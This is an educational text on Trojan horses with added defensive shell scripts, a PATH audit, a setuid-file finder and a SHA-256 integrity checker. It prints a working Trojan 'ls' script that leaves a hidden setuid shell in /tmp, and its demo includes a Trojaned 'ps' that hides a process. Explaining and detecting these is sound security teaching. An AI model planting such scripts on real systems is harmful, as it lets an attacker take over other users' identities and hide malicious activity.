Trojan Horses
A Trojan horse is a useful, or apparently useful, program or
command procedure containing hidden code that, when invoked, performs some
unwanted or harmful function.
A Trojan horse is a program with an
overt (documented or known) effect and a covert
(undocumented or unexpected) effect.
Example: A Trojan horse version of ls. The script below is named ls and left where a victim is likely to run it (the chmod arguments of the widely reprinted original, o+s,w+x, are corrected here so the copy really is setuid and executable by others):

cp /bin/sh /tmp/.xxsh        # hidden copy of the shell, owned by whoever runs this script
chmod u+s,go+x /tmp/.xxsh    # setuid to that owner, executable by everyone
rm ./ls                      # remove the Trojan so nothing odd is left behind
ls $*                        # overt function: list the directory as expected

The overt purpose is to list the files in a directory. The covert purpose is to create a shell that is setuid to the user executing the script; the attacker later runs /tmp/.xxsh and acts with that user's identity. Hence this program is a Trojan horse. The trick depends on the victim's search path: the attacker's ls must be found before /bin/ls, which happens when "." appears early in PATH and the victim changes into the attacker's directory and types ls. On modern systems the payload is also weaker than it looks, since bash and several other shells reset a setuid effective UID unless started with -p, and /tmp is commonly mounted nosuid.
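Two checks a defender would run against exactly this kind of Trojan, as an added example and not code from the original post: audit_path flags PATH components that let a file named ls in the current directory or in a world-writable directory shadow /bin/ls, and find_setuid lists setuid files under a directory such as /tmp, where the script above leaves /tmp/.xxsh. The function names, the output format and the constructed sandbox are this example's own choices; the script only touches a temporary directory it creates and removes.

```shell
#!/bin/sh
# Added example, not code from the original post: two checks aimed at the ls Trojan
# above. audit_path flags PATH components that let a file named "ls" in the current
# directory or in a world-writable directory shadow /bin/ls; find_setuid lists
# setuid files under a directory such as /tmp, where that script leaves /tmp/.xxsh.
# Function names, output format and the sandbox below are this example's own choices.

# Print one line per risky PATH component in $1 and return 1 if any was found.
# Risky: an empty component or "." (both mean the current directory), a relative
# path, and an existing directory that is writable by others (permission bit 002).
audit_path() {
    rest="$1:"     # trailing colon keeps a final empty component visible to the loop
    rc=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            ""|.)
                echo "RISK current directory in PATH: '${entry:-<empty>}'"; rc=1 ;;
            /*)
                # -prune stops find from descending; only the directory itself is tested.
                if [ -d "$entry" ] && [ -n "$(find "$entry" -prune -perm -002 -print 2>/dev/null)" ]; then
                    echo "RISK world-writable directory in PATH: $entry"; rc=1
                fi ;;
            *)
                echo "RISK relative directory in PATH: $entry"; rc=1 ;;
        esac
    done
    return $rc
}

# List regular files under $1 that carry the setuid bit (mode 4000).
find_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# Demo on a constructed sandbox that imitates /tmp after the Trojan ran; nothing
# outside the sandbox is touched and it is removed afterwards.
sandbox=$(mktemp -d)
chmod 1777 "$sandbox"                                  # same mode as /tmp: world-writable, sticky
: > "$sandbox/.xxsh" && chmod 4755 "$sandbox/.xxsh"    # stand-in for the setuid shell copy
echo "--- PATH audit ---"
audit_path ".:/usr/local/bin:$sandbox:/usr/bin:" || echo "-> PATH is unsafe"
echo "--- setuid files under $sandbox ---"
find_setuid "$sandbox"
rm -rf "$sandbox"
```

audit_path is meant for a login script or a hardening check (audit_path "$PATH"); find_setuid /tmp is the corresponding periodic sweep, and any hit there is worth investigating because nothing legitimate needs a setuid binary in a scratch directory.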
Trojan horse programs can be used to accomplish functions
indirectly that an unauthorized user could not accomplish directly. For
example, to gain access to the files of another user on a shared system, a user
could create a Trojan horse program that, when executed, changes the invoking
user’s file permissions so that the files are readable by any user. The author
could then induce users to run the program by placing it in a common directory and
naming it such that it appears to be a useful utility program or application.
When a Trojan is activated on a computer, the results vary. Some Trojans are designed to be more annoying than malicious (changing the desktop, adding silly active-desktop icons); others cause serious damage by deleting files and destroying information on the system. Trojans are also known to create a backdoor on the computer that gives attackers access to the system, possibly allowing confidential or personal information to be compromised.
Example: The NetBus program allows an attacker to control a Windows NT workstation remotely. The attacker can intercept keystrokes or mouse motions, upload and download files, and act as a system administrator would. For this to work, the victim Windows NT system must be running a server component with which the NetBus client can communicate, so someone on the victim's system has to load and execute a small program that starts that server. This small program was bundled into several small game programs as well as some other "fun" programs, which could be distributed to Web sites where unsuspecting users would be likely to download them.
Trojan horses can make copies of themselves. One of the earliest Trojan horses was a version of the game animal. When this game was played, it created an extra copy of itself. These copies spread, taking up a great deal of disk space. The program was then modified to delete one copy of the earlier version and create two copies of the modified program. Because it spread even more rapidly than the earlier version, the modified version of animal soon completely supplanted the earlier version. After a preset date, each copy of the later version deleted itself after it was played.
A propagating
Trojan horse (also called a replicating Trojan horse) is a Trojan horse that creates a copy
of itself.
Trojan horses fit into one of three models:
- Continuing to perform the function of the original program and additionally performing a separate malicious activity
- Continuing to perform the function of the original program but modifying the function to perform malicious activity (e.g., a Trojan horse version of a login program that collects passwords) or to disguise other malicious activity (e.g., a Trojan horse version of a process listing program that does not display certain processes that are malicious)
- Performing a malicious function that completely replaces the function of the original program
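The second and third models above replace a trusted program with a look-alike (a login that keeps passwords, a ps that hides processes), so the check that catches them is an integrity baseline rather than anything the program itself reports. The following is an added example, not code from the original post: make_manifest records a SHA-256 for every file under a directory, and verify_manifest re-hashes the tree and reports anything modified, missing or new. The function names, the manifest format and the constructed bin/ tree are this example's own; it assumes sha256sum from GNU coreutils and file names without whitespace.

```shell
#!/bin/sh
# Added example, not code from the original post. The second and third models above
# swap a trusted program for a look-alike, so the check that catches them is an
# integrity baseline: make_manifest records a SHA-256 for every file under a
# directory, verify_manifest re-hashes the tree and reports anything modified,
# missing or new. Function names, manifest format and the constructed sandbox are
# this example's own; in production the manifest lives off the monitored host, and
# packaged systems provide rpm -V or debsums for the same purpose.
# Assumes sha256sum (GNU coreutils) and file names without whitespace.

# Write "<sha256>  ./relative/path" for every regular file under $1 into $2.
make_manifest() {
    (cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2) > "$2"
}

# Check tree $1 against manifest $2. Prints MODIFIED / MISSING / NEW lines and
# returns 1 if anything differs from the baseline, 0 if the tree is clean.
verify_manifest() {
    dir=$1; manifest=$2; rc=0
    while read -r expected rel; do
        if [ ! -f "$dir/$rel" ]; then
            echo "MISSING  $rel"; rc=1; continue
        fi
        actual=$(cd "$dir" && sha256sum "$rel" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "MODIFIED $rel"; rc=1
        fi
    done < "$manifest"
    # A file absent from the baseline (a dropped backdoor) matters as much as a changed one.
    for f in $(cd "$dir" && find . -type f); do
        awk -v f="$f" '$2 == f { found = 1 } END { exit !found }' "$manifest" \
            || { echo "NEW      $f"; rc=1; }
    done
    return $rc
}

# Demo: a constructed bin/ tree, a baseline, then ps replaced by a Trojan version
# that filters a (constructed) process name out of the listing, the hiding case
# from the second model.
sandbox=$(mktemp -d)
mkdir "$sandbox/bin"
printf '#!/bin/sh\nexec /bin/ls "$@"\n' > "$sandbox/bin/ls"
printf '#!/bin/sh\nexec /bin/ps "$@"\n' > "$sandbox/bin/ps"
make_manifest "$sandbox" "$sandbox.manifest"
echo "--- baseline check ---"
verify_manifest "$sandbox" "$sandbox.manifest" && echo "clean"
printf '#!/bin/sh\n/bin/ps "$@" | grep -v rootkitd\n' > "$sandbox/bin/ps"   # Trojaned ps
echo "--- after replacing ps ---"
verify_manifest "$sandbox" "$sandbox.manifest" || echo "-> tampering detected"
rm -rf "$sandbox" "$sandbox.manifest"
```

The check is only as trustworthy as the tools it runs: a Trojaned sha256sum or find on the monitored host defeats it, which is why real integrity checkers are run from known-good media or compare against a manifest stored elsewhere.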